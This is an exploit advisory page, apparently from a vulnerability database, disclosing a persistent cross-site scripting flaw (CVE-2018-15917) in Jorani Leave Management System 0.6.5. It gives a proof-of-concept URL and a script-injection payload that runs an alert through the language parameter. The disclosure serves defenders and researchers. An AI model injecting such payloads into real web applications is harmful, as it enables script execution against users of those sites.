Jorani Leave Management System 0.6.5 Cross Site Scripting

2018.09.06
Credit: Javier Olmedo
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Jorani Leave Management System 0.6.5 a Cross-Site Scripting # Exploit Author: Javier Olmedo # Website: https://hackpuntes.com # Date: 2018-09-06 # Google Dork: N/A # Vendor: Benjamin BALET # Software Link: https://jorani.org/download.html # Affected Version: 0.6.5 and possibly before # Patched Version: unpatched # Category: Web Application # Platform: Windows # Tested on: Win10x64 & Kali Linux # CVE: 2018-15917 # 1. Technical Description: # Language parameter is vulnerable to Persistent Cross-Site Scripting (XSS) attacks through # a GET request in which the values are stored in the user session. # 2. Proof Of Concept (PoC): # Go to http://localhost/session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-15917%27)%3C%2Fscript%3E&login=&CipheredValue= # 3. Payload: # en"><script>alert('PoC CVE-2018-15917')</script> # 6. Reference: # https://hackpuntes.com/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/ # https://github.com/bbalet/jorani/issues/254


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top